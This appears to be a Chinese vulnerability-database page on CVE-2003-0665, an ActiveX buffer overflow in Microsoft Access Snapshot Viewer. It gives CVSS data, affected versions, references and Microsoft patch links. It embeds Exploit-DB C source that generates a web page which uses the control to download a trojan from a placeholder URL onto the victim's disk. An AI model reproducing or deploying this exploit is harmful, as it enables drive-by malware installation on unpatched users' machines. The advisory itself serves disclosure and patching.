CVE-2003-0665
CVSS7.5
发布时间 :2003-10-20 00:00:00
修订时间 :2012-09-12 21:20:49
NMCOES    

[原文]Buffer overflow in the ActiveX control for Microsoft Access Snapshot Viewer for Access 97, 2000, and 2002 allows remote attackers to execute arbitrary code via long parameters to the control.


[CNNVD]Microsoft Access Snapshot Viewer远程缓冲区溢出漏洞(MS03-038)(CNNVD-200310-046)

        
        Microsoft Access Snapshot Viewer是Office 2000中的报表快照功能实现。允许没有安装Access即查看报表内容,如客户可以使用Access发送发票给客户。Snapshot Viewer包含在所有Access版本中,不过不是默认安装。Snapshot Viewer通过使用ActiveX控件实现。
        Snapshot Viewer由于不正确验证部分参数,远程攻击者可以利用这个漏洞构建恶意页面,诱使用户访问,可触发缓冲区溢出。
        由于没有对文件中部分参数缺少充分的缓冲区边界检查,攻击者可以诱使用户访问包含恶意数据的WEB页面,当Snapshot Viewer解析时发生溢出,精心构建页面数据可能以用户进程权限在系统上执行任意指令。
        

- CVSS (基础分值)

CVSS分值: 7.5 [严重(HIGH)]
机密性影响: PARTIAL [很可能造成信息泄露]
完整性影响: PARTIAL [可能会导致系统文件被修改]
可用性影响: PARTIAL [可能会导致性能下降或中断资源访问]
攻击复杂度: LOW [漏洞利用没有访问限制 ]
攻击向量: [--]
身份认证: NONE [漏洞利用无需身份认证]

- CPE (受影响的平台与产品)

cpe:/a:microsoft:access:2002:sp1Microsoft Access 2002 sp1
cpe:/a:microsoft:access:2000:sp3Microsoft Access 2000 sp3
cpe:/a:microsoft:access:2000Microsoft Access 2000
cpe:/a:microsoft:access:2002Microsoft Access 2002
cpe:/a:microsoft:access:2002:sp2Microsoft Access 2002 sp2
cpe:/a:microsoft:access:97Microsoft Access 97
cpe:/a:microsoft:access:2000:sp2Microsoft Access 2000 sp2
cpe:/a:microsoft:access:2000:sp1Microsoft Access 2000_sr1

- OVAL (用于检测的技术细节)

未找到相关OVAL定义

- 官方数据库链接

http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2003-0665
(官方数据源) MITRE
http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2003-0665
(官方数据源) NVD
http://www.cnnvd.org.cn/vulnerability/show/cv_cnnvdid/CNNVD-200310-046
(官方数据源) CNNVD

- 其它链接及资源

http://www.kb.cert.org/vuls/id/992132
(UNKNOWN)  CERT-VN  VU#992132
http://www.microsoft.com/technet/security/bulletin/ms03-038.asp
(VENDOR_ADVISORY)  MS  MS03-038
http://www.securityfocus.com/bid/8536
(UNKNOWN)  BID  8536
http://secunia.com/advisories/9668
(UNKNOWN)  SECUNIA  9668

- 漏洞信息

Microsoft Access Snapshot Viewer远程缓冲区溢出漏洞(MS03-038)
高危 边界条件错误
2003-10-20 00:00:00 2005-10-20 00:00:00
远程  
        
        Microsoft Access Snapshot Viewer是Office 2000中的报表快照功能实现。允许没有安装Access即查看报表内容,如客户可以使用Access发送发票给客户。Snapshot Viewer包含在所有Access版本中,不过不是默认安装。Snapshot Viewer通过使用ActiveX控件实现。
        Snapshot Viewer由于不正确验证部分参数,远程攻击者可以利用这个漏洞构建恶意页面,诱使用户访问,可触发缓冲区溢出。
        由于没有对文件中部分参数缺少充分的缓冲区边界检查,攻击者可以诱使用户访问包含恶意数据的WEB页面,当Snapshot Viewer解析时发生溢出,精心构建页面数据可能以用户进程权限在系统上执行任意指令。
        

- 公告与补丁

        厂商补丁:
        Microsoft
        ---------
        Microsoft已经为此发布了一个安全公告(MS03-038)以及相应补丁:
        MS03-038:Unchecked buffer in Microsoft Access Snapshot Viewer Could Allow Code Execution(827104)
        链接:
        http://www.microsoft.com/technet/security/bulletin/MS03-038.asp

        补丁下载:
        Access 2002:
        
        http://microsoft.com/downloads/details.aspx?FamilyId=B50D4863-1BBE-4009-9DF8-52D3A916D54F&displaylang=en

        
        http://microsoft.com/office/ork/xp/journ/snpv1001a.htm
(administrative update only)
        Access 2000:
        
        http://microsoft.com/downloads/details.aspx?FamilyId=F6CB9C8E-16E3-422D-86DD-7ED5671FB8D4&displaylang=en.

        
        http://microsoft.com/office/ork/2000/journ/snpv0901.htm
(administrative update only)
        Access 97:
        安装升级的独立Snapshot Viewer控件,可以访问如下站点:
        http://www.microsoft.com/AccessDev/Articles/snapshot.htm

        Stand-alone Snapshot Viewer Control:
        http://www.microsoft.com/AccessDev/Articles/snapshot.htm

- 漏洞信息 (23095)

Microsoft Access 97/2000/2002 Snapshot Viewer ActiveX Control Parameter Buffer Overflow Vulnerability (EDBID:23095)
windows remote
2003-09-03 Verified
0 Oliver Lavery
N/A [点击下载]
source: http://www.securityfocus.com/bid/8536/info

Microsoft Access Snapshot Viewer is prone to a remote buffer-overflow condition because the software fails to perform sufficient boundary checks on user-supplied parameters. Presumably, a remote attacker may be able to leverage this issue to execute arbitrary code in the context of the user running the affected Internet Explorer. 

/* Microsoft Access Snapshot Viewer ActiveX Control Exploit
   Ms-Acees SnapShot Exploit Snapview.ocx v 10.0.5529.0
   Download nice binaries into an arbitrary box
   Vulnerability discovered by Oliver Lavery 
   http://www.securityfocus.com/bid/8536/info
   Remote: Yes
   greetz to str0ke */

#include <stdio.h>
#include <stdlib.h>


#define Filename        "Ms-Access-SnapShot.html"


FILE *File;
char data[] = 
"<html>\n<objectclassid='clsid:F0E42D50-368C-11D0-AD81-00A0C90DC8D9'id='attaque'></object>\n"
              "<script language='javascript'>\nvar arbitrary_file = 
'http://path_to_trojan'\n"
              "var dest = 
'C:/Docume~1/ALLUSE~1/trojan.exe'\nattack.SnapshotPath = 
arbitrary_file\n"
              "attack.CompressedPath = 
destination\nattack.PrintSnapshot(arbitrary_file,destination)\n"
              "<script>\n<html>";

int main ()
{
        printf("**Microsoft Access Snapshot Viewer ActiveX 
Exploit**\n");
        printf("**c0ded by callAX**\n");
        printf("**r00t your enemy .| **");

        FILE *File;
        char *b0fer;

        if ( (File = fopen(Filename,"w+b")) == NULL ) {
                printf("\n fopen() error");
                exit(1);
        }

        b0fer = (char*)malloc(strlen(data));
        memcpy(b0fer,data,sizeof(data)-1);


        fwrite(b0fer, strlen(data), 1,File);
        fclose(File);

        printf("\n\n" Filename " has been created.\n");
        return 0;
}
		

- 漏洞信息

10998
Microsoft Access Snapshot Viewer ActiveX Control Arbitrary Command Execution
Remote / Network Access, Context Dependent Input Manipulation

- 漏洞描述

Unknown or Incomplete

- 时间线

2003-09-03 Unknow
Unknow Unknow

- 解决方案

Unknown or Incomplete

- 相关参考

- 漏洞作者

Unknown or Incomplete

- 漏洞信息

Microsoft Access Snapshot Viewer ActiveX Control Parameter Buffer Overflow Vulnerability
Boundary Condition Error 8536
Yes No
2003-09-03 12:00:00 2008-07-24 11:18:00
Discovery of this vulnerability has been credited to Oliver Lavery.

- 受影响的程序版本

Microsoft Access 97
+ Microsoft Office 97
- Microsoft Windows 95
- Microsoft Windows 98
- Microsoft Windows NT 4.0
Microsoft Access 2002 SP2
- Microsoft Windows 2000 Professional SP3
- Microsoft Windows 2000 Professional SP2
- Microsoft Windows 2000 Professional SP1
- Microsoft Windows 2000 Professional
- Microsoft Windows 98
- Microsoft Windows 98SE
- Microsoft Windows ME
- Microsoft Windows NT Workstation 4.0 SP6a
- Microsoft Windows NT Workstation 4.0 SP6
- Microsoft Windows NT Workstation 4.0 SP5
- Microsoft Windows NT Workstation 4.0 SP4
- Microsoft Windows NT Workstation 4.0 SP3
- Microsoft Windows NT Workstation 4.0 SP2
- Microsoft Windows NT Workstation 4.0 SP1
- Microsoft Windows NT Workstation 4.0
- Microsoft Windows XP Home SP1
- Microsoft Windows XP Home
- Microsoft Windows XP Professional SP1
- Microsoft Windows XP Professional
Microsoft Access 2002 SP1
Microsoft Access 2002
+ Microsoft Office XP
- Microsoft Windows 2000 Advanced Server SP2
- Microsoft Windows 2000 Advanced Server SP1
- Microsoft Windows 2000 Advanced Server
- Microsoft Windows 2000 Datacenter Server SP2
- Microsoft Windows 2000 Datacenter Server SP1
- Microsoft Windows 2000 Datacenter Server
- Microsoft Windows 2000 Professional SP2
- Microsoft Windows 2000 Professional SP1
- Microsoft Windows 2000 Professional
- Microsoft Windows 2000 Server SP2
- Microsoft Windows 2000 Server SP1
- Microsoft Windows 2000 Server
- Microsoft Windows 2000 Terminal Services SP2
- Microsoft Windows 2000 Terminal Services SP1
- Microsoft Windows 2000 Terminal Services
- Microsoft Windows 98
- Microsoft Windows 98SE
- Microsoft Windows ME
- Microsoft Windows NT Enterprise Server 4.0 SP6a
- Microsoft Windows NT Enterprise Server 4.0 SP6
- Microsoft Windows NT Server 4.0 SP6a
- Microsoft Windows NT Server 4.0 SP6
- Microsoft Windows NT Terminal Server 4.0 SP6
- Microsoft Windows NT Workstation 4.0 SP6a
- Microsoft Windows NT Workstation 4.0 SP6
- Microsoft Windows XP Home
- Microsoft Windows XP Professional
Microsoft Access 2000 SR1
Microsoft Access 2000 SP3
- Microsoft Windows 2000 Professional SP3
- Microsoft Windows 2000 Professional SP2
- Microsoft Windows 2000 Professional SP1
- Microsoft Windows 2000 Professional
- Microsoft Windows 98
- Microsoft Windows 98SE
- Microsoft Windows ME
- Microsoft Windows NT Workstation 4.0 SP6a
- Microsoft Windows NT Workstation 4.0 SP6
- Microsoft Windows NT Workstation 4.0 SP5
- Microsoft Windows NT Workstation 4.0 SP4
- Microsoft Windows NT Workstation 4.0 SP3
- Microsoft Windows NT Workstation 4.0 SP2
- Microsoft Windows NT Workstation 4.0 SP1
- Microsoft Windows NT Workstation 4.0
- Microsoft Windows XP Home SP1
- Microsoft Windows XP Home
- Microsoft Windows XP Professional SP1
- Microsoft Windows XP Professional
Microsoft Access 2000 SP2
Microsoft Access 2000
+ Microsoft Office 2000
- Microsoft Windows 2000 Professional
- Microsoft Windows 95
- Microsoft Windows 98
- Microsoft Windows NT 4.0

- 漏洞讨论

Microsoft Access Snapshot Viewer is prone to a remote buffer-overflow condition because the software fails to perform sufficient boundary checks on user-supplied parameters. Presumably, a remote attacker may be able to leverage this issue to execute arbitrary code in the context of the user running the affected Internet Explorer.

- 漏洞利用

The following exploit code is available:

- 解决方案

Microsoft has released fixes. This fix does not set the kill bit on the affected ActiveX control. The vendor has reported that a kill bit will be issued for the old affected control in a forthcoming Internet Explorer security patch. The vendor advises customers who are running Access 97 and the standalone Snapshot Viewer to install the updated standalone Snapshot Viewer. See the references for details.


Microsoft Access 97

Microsoft Access 2000 SP3

Microsoft Access 2002 SP2

- 相关参考

 

 

关于SCAP中文社区

SCAP中文社区是国内第一个以SCAP为主题的中文开放社区。了解更多信息,请查阅[关于本站]

版权声明

CVE/CWE/OVAL均为MITRE公司的注册商标,它们的官方数据源均保存在MITRE公司的相关网站